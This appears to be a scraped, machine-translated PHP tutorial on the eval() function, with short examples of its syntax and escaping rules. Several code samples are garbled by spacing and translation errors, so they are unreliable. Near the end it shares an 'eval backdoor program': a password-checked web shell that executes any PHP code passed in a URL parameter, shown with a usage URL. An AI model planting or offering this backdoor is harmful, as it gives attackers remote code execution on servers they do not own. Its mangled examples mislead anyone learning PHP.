PHPeval function introduction _ PHP Tutorial

PHPeval function usage introduction. Code: Copy the code as follows: eval (echohelloworld;); the above code is equivalent to the following code: echohelloworld; output in the browser: helloworld use eval () pay attention to the code:

The code is as follows:

Eval ("echo 'hello world ';");

The above code is equivalent to the following code:

Echo "hello world ";

Output in the browser: hello world

When using eval (), pay attention to the following points:

1. the parameter string of the eval function must end with a semicolon and a semicolon (this semicolon is a php limitation)

2. pay attention to the use of single quotes, double quotes, and backslash. If a parameter contains a variable and the variable has a value assignment operation, the $ symbol before the variable must be escaped. You do not need to assign values.

Code:

The code is as follows:

$ A = 100;
Eval ("echo $ ;");

Because there is no value assignment operation, you can escape $ Without \. equivalent to the following code:

The code is as follows:

$ A = 100;
Eval ("echo \ $ ;")

3. Note that double quotation marks must be provided on both sides of the imperative string (including semicolons) or single quotation marks must be used as needed. Otherwise, an error is returned.

An imperative string refers to a string that contains commands such as echo and print.

If the parameter has only one variable, you do not need to use it. For example:

The code is as follows:

$ Func = < Function test (){
Echo "test eval function ";
}
FUNC;
Eval ($ func );
Test ();

Share a php eval backdoor program

The eval function must be supported.
Usage
Http: // url/test. php? Pwd = admin & action = eval & a = phpinfo ();

The code is as follows:

$ Passwd = "admin"; if ($ _ GET ['pwd']! = $ Passwd) exit;
If ($ _ GET ['action'] = "eval" & $ _ GET ['A']) {eval ($ _ GET ['A']);}
?>

The signature code is as follows: eval ("echo 'hello world';"); the above code is equivalent to the following code: echo "hello world"; output in the browser: when using eval () for hello world, please note that...